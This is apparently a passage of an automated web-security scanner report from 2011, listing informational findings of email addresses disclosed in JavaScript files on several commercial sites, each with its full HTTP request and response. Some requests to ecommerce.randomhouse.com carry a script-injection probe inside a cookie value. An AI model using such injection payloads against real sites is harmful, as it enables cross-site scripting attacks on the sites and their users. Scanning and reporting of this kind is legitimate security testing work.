Last-Modified: Wed, 20 Apr 2011 00:28:22 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: ECS (dca/5326)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 437201

//
////
// Copyright(c) 2010 Sencha Inc.
// licensing@sencha.com
// http://www.sencha.com/touchlicense
//
if(typeof Ext==="undefined"){Ext={}}Ext.apply=(function(){for(var a in {valueOf:1}){return function(c,b,e){if(e){Ext.apply(c,e)}if(c&&b&&typeof b==="object"
...[SNIP]...

24.7. https://checkout.netsuite.com/c.1142057/site/js/general-scripts.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /c.1142057/site/js/general-scripts.js

Issue detail

The following email address was disclosed in the response:

Request

GET /c.1142057/site/js/general-scripts.js HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Referer: https://checkout.netsuite.com/s.nl?c=1142057&sc=4&whence=&n=1&ext=F&redirect_count=1&did_javascript_redirect=T
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bn_u=6923519460848807096; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); mbox=PC#1303736347554-914602.17#1304955927|check#true#1303746387|session#1303743154006-383984#1303748187; JSESSIONID=RPwlN37bBGN1BHsvqNxQ1vGBsr26W2BPCyktJKKZMYNbn8B0yWp44RPTyL4skYr9MQJLJQclG4l9NpdBQ6NlhFTGlWJt4trMCxT6LyM5FzLTxKnn4bw07h6pskHCrpHz!534658191; NLVisitorId=rcHW8655Ac-HwJur; NLShopperId=rcHW8655AeSHwA-v; NS_VER=2011.1.0; gc=1142057_clear

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:41:37 GMT
Server: Apache
Cache-Control: max-age=604800
Content-Disposition: inline;filename="general-scripts.js"
NS_RTIMER_COMPOSITE: 327963372:616363742D6A6176613034302E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=748
Connection: Keep-Alive
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 7430

/*
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @pa
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

24.8. http://ecommerce.randomhouse.com/store/js/rh/ecom.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ecommerce.randomhouse.com
Path:   /store/js/rh/ecom.js

Issue detail

The following email address was disclosed in the response:

Request

GET /store/js/rh/ecom.js HTTP/1.1
Host: ecommerce.randomhouse.com
Proxy-Connection: keep-alive
Referer: http://ecommerce.randomhouse.com/cart.do?from=randomhouse
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=9D7F2B422015BC40089F4A74818D3783.ecommerce_wrk1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:25 GMT
Server: Apache
Last-Modified: Wed, 02 Dec 2009 15:30:55 GMT
ETag: "a170-ced-8f7f29c0"
Accept-Ranges: bytes
Content-Length: 3309
Content-Type: application/x-javascript

function rh_js_PopWin(url,name,options){
var ContextWindow = window.open(url,name,options);
ContextWindow.focus();
return false;
}
function validateEmail(email) {
   var illegalChars = /[ \(\)\<\>
...[SNIP]...
<>[],;:\/#"'); return false; }
   if( email != "" && !emailFilter.test(email)) { alert("Your e-mail address must contain '@' and end in dot-something (e.g. 'myname@domain.com')"); return false; }
   return true;
}
function validateCreate(form) {
   if( form.firstName.value == '') {
       alert( 'First Name is required');
       return false;
   }
   if( form.lastName.value == '') {
       alert
...[SNIP]...

24.9. http://ecommerce.randomhouse.com/store/js/rh/prototype.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ecommerce.randomhouse.com
Path:   /store/js/rh/prototype.js

Issue detail

The following email address was disclosed in the response:

Request

GET /store/js/rh/prototype.js HTTP/1.1
Host: ecommerce.randomhouse.com
Proxy-Connection: keep-alive
Referer: http://ecommerce.randomhouse.com/cart.do?from=randomhouse
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=9D7F2B422015BC40089F4A74818D3783.ecommerce_wrk1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:24 GMT
Server: Apache
Last-Modified: Tue, 05 Feb 2008 14:44:22 GMT
ETag: "a1de-7131-46b59d80"
Accept-Ranges: bytes
Content-Length: 28977
Content-Type: application/x-javascript

/* Prototype JavaScript framework, version 1.3.1
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* THIS FILE IS AUTOMATICALLY GENERATED. When sending patches, please diff
* against the source
...[SNIP]...

24.10. http://ecommerce.randomhouse.com/store/js/rh/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ecommerce.randomhouse.com
Path:   /store/js/rh/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /store/js/rh/s_code.js HTTP/1.1
Host: ecommerce.randomhouse.com
Proxy-Connection: keep-alive
Referer: http://ecommerce.randomhouse.com/cart.do?from=randomhouse
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=9D7F2B422015BC40089F4A74818D3783.ecommerce_wrk1; mbox=check#true#1303855659|session#1303855598284-166145#1303857459|PC#1303855598284-166145#1366927599

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:28 GMT
Server: Apache
Last-Modified: Mon, 15 Dec 2008 15:25:36 GMT
ETag: "a7c7-5db6-74579c00"
Accept-Ranges: bytes
Content-Length: 23990
Content-Type: application/x-javascript

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
Plu
...[SNIP]...
.hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L;
...[SNIP]...

24.11. https://ecommerce.randomhouse.com//store/js/rh/ecom.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   //store/js/rh/ecom.js

Issue detail

The following email address was disclosed in the response:

Request

GET //store/js/rh/ecom.js HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com//account.do
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303859918|PC#1303855598284-166145#1366930058|check#true#1303858118; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:49:30 GMT
Server: Apache
Last-Modified: Wed, 02 Dec 2009 15:30:55 GMT
ETag: "a170-ced-8f7f29c0"
Accept-Ranges: bytes
Content-Length: 3309
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

function rh_js_PopWin(url,name,options){
var ContextWindow = window.open(url,name,options);
ContextWindow.focus();
return false;
}
function validateEmail(email) {
   var illegalChars = /[ \(\)\<\>
...[SNIP]...
<>[],;:\/#"'); return false; }
   if( email != "" && !emailFilter.test(email)) { alert("Your e-mail address must contain '@' and end in dot-something (e.g. 'myname@domain.com')"); return false; }
   return true;
}
function validateCreate(form) {
   if( form.firstName.value == '') {
       alert( 'First Name is required');
       return false;
   }
   if( form.lastName.value == '') {
       alert
...[SNIP]...

24.12. https://ecommerce.randomhouse.com//store/js/rh/prototype.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   //store/js/rh/prototype.js

Issue detail

The following email address was disclosed in the response:

Request

GET //store/js/rh/prototype.js HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com//account.do
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303859918|PC#1303855598284-166145#1366930058|check#true#1303858118; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:49:29 GMT
Server: Apache
Last-Modified: Tue, 05 Feb 2008 14:44:22 GMT
ETag: "a1de-7131-46b59d80"
Accept-Ranges: bytes
Content-Length: 28977
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

/* Prototype JavaScript framework, version 1.3.1
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* THIS FILE IS AUTOMATICALLY GENERATED. When sending patches, please diff
* against the source
...[SNIP]...

24.13. https://ecommerce.randomhouse.com//store/js/rh/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   //store/js/rh/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET //store/js/rh/s_code.js HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com//account.do
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1; mbox=session#1303855598284-166145#1303860046|PC#1303855598284-166145#1366930186|check#true#1303858246

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:49:38 GMT
Server: Apache
Last-Modified: Mon, 15 Dec 2008 15:25:36 GMT
ETag: "a7c7-5db6-74579c00"
Accept-Ranges: bytes
Content-Length: 23990
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
Plu
...[SNIP]...
.hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L;
...[SNIP]...

24.14. https://ecommerce.randomhouse.com/store/js/rh/ecom.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /store/js/rh/ecom.js

Issue detail

The following email address was disclosed in the response:

Request

GET /store/js/rh/ecom.js HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/account.do?from=randomhouse
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; mbox=check#true#1303855659|session#1303855598284-166145#1303857459|PC#1303855598284-166145#1366927599; JSESSIONID=388CC68FD235E0B3FC2D6F4CD6E761C9.ecommerce_wrk1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:34 GMT
Server: Apache
Last-Modified: Wed, 02 Dec 2009 15:30:55 GMT
ETag: "a170-ced-8f7f29c0"
Accept-Ranges: bytes
Content-Length: 3309
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

function rh_js_PopWin(url,name,options){
var ContextWindow = window.open(url,name,options);
ContextWindow.focus();
return false;
}
function validateEmail(email) {
   var illegalChars = /[ \(\)\<\>
...[SNIP]...
<>[],;:\/#"'); return false; }
   if( email != "" && !emailFilter.test(email)) { alert("Your e-mail address must contain '@' and end in dot-something (e.g. 'myname@domain.com')"); return false; }
   return true;
}
function validateCreate(form) {
   if( form.firstName.value == '') {
       alert( 'First Name is required');
       return false;
   }
   if( form.lastName.value == '') {
       alert
...[SNIP]...

24.15. https://ecommerce.randomhouse.com/store/js/rh/prototype.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /store/js/rh/prototype.js

Issue detail

The following email address was disclosed in the response:

Request

GET /store/js/rh/prototype.js HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/account.do?from=randomhouse
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; mbox=check#true#1303855659|session#1303855598284-166145#1303857459|PC#1303855598284-166145#1366927599; JSESSIONID=388CC68FD235E0B3FC2D6F4CD6E761C9.ecommerce_wrk1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:32 GMT
Server: Apache
Last-Modified: Tue, 05 Feb 2008 14:44:22 GMT
ETag: "a1de-7131-46b59d80"
Accept-Ranges: bytes
Content-Length: 28977
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

/* Prototype JavaScript framework, version 1.3.1
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* THIS FILE IS AUTOMATICALLY GENERATED. When sending patches, please diff
* against the source
...[SNIP]...

24.16. https://ecommerce.randomhouse.com/store/js/rh/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /store/js/rh/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /store/js/rh/s_code.js HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/account.do?from=randomhouse
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=388CC68FD235E0B3FC2D6F4CD6E761C9.ecommerce_wrk1; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; CP=null*; mbox=check#true#1303855669|session#1303855598284-166145#1303857469|PC#1303855598284-166145#1366927609

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:40 GMT
Server: Apache
Last-Modified: Mon, 15 Dec 2008 15:25:36 GMT
ETag: "a7c7-5db6-74579c00"
Accept-Ranges: bytes
Content-Length: 23990
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
Plu
...[SNIP]...
.hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L;
...[SNIP]...

24.17. http://global.msads.net/defaultads/ads/defaultads/1402.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://global.msads.net
Path:   /defaultads/ads/defaultads/1402.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /defaultads/ads/defaultads/1402.gif?C=P&E=10&N=C22&R=CO1 HTTP/1.1
Host: global.msads.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:41:02 GMT
Expires: Sun, 11 Mar 2012 02:34:49 GMT
Last-Modified: Tue, 15 Feb 2000 01:13:30 GMT
Cache-Control: max-age=31536000
Content-Type: image/gif
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Content-Length: 85

GIF89a.......................................................!.......,........@...E.;

24.18. http://kbportal.thomson.com/js/autoComplete.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /js/autoComplete.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/autoComplete.js HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/search.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_sq=%5B%5BB%5D%5D; s_ppv=100; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Content-Length: 30863
Content-Type: application/x-javascript
Last-Modified: Fri, 19 Jun 2009 02:38:36 GMT
Accept-Ranges: bytes
ETag: "05e71b87f0c91:268"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:04:46 GMT

/* Auto-suggest/auto-complete control
*
* original code:
* (C) 2004-2005 zichun

* fixes and heavy modifications:
* (C) 2007 Dmitriy Khudorozhkov (kh_dmitry2001@mail.ru) and contributors.

* Customized by Geoffrey J. Swenson to use external styles, remove code bloat.
* (C) 2008 Talisma / nGenera Corporation.

* This software is provided "as-is", without any e
...[SNIP]...

24.19. http://matrix.itasoftware.com/js/sites/matrix/nls/site_en-us.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matrix.itasoftware.com
Path:   /js/sites/matrix/nls/site_en-us.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/sites/matrix/nls/site_en-us.js?v07201101242 HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.10.10.1303847753

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:56:50 GMT
Server: Apache-Coyote/1.1
Expires: Thu, 04 Aug 2011 19:56:50 GMT
Cache-Control: max-age=8640000
Accept-Ranges: bytes
ETag: W/"50804-1299862394000"
Last-Modified: Fri, 11 Mar 2011 16:53:14 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Content-Length: 50804

dojo.provide("sites.matrix.nls.site_en-us");dojo.provide("sites.matrix.nls.messages");sites.matrix.nls.messages._built=true;dojo.provide("sites.matrix.nls.messages.en_us");sites.matrix.nls.messages.en
...[SNIP]...
s":"Stops","filterObserver_arrivalTime_not":"No ${values} (arrive)","grid_column_price_tooltip":"Sort by price","morning":"Morning","form_emailAddress_error":"Please enter a valid email address (e.g., yourAddress@example.com)","pricing_bookingCode":"booking code","form_allowAirportChanges":"Allow airport changes","shop_loading_summarize":"Updating flight info","filterObserver_arrivalTime_only":"Only ${values} (arrive)","l
...[SNIP]...

24.20. http://media.computerworlduk.com/scripts/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.computerworlduk.com
Path:   /scripts/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/s_code.js?20110408145250 HTTP/1.1
Host: media.computerworlduk.com
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=623037e9893129cc51ee472d192c4c186210; __utmz=129297054.1303854555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129297054.1937977063.1303854555.1303854555.1303854555.1; __utmc=129297054; __utmb=129297054.1.10.1303854555; __unam=8f316ea-12f93c9a01d-4bc8d0c8-1

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://www.computerworlduk.com/scripts/s_code.js?20110408145250
Accept-Ranges: bytes
ETag: "f3620bc1d8cb1:996e"
Server: Microsoft-IIS/6.0
Age: 23738
Date: Tue, 26 Apr 2011 21:49:32 GMT
Last-Modified: Tue, 01 Mar 2011 11:13:47 GMT
Content-Length: 32042
Connection: keep-alive

/* SiteCatalyst code version: H.19.4
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */

var s=s_gi(s_account)
/************************** CONFIG SECTION *******
...[SNIP]...
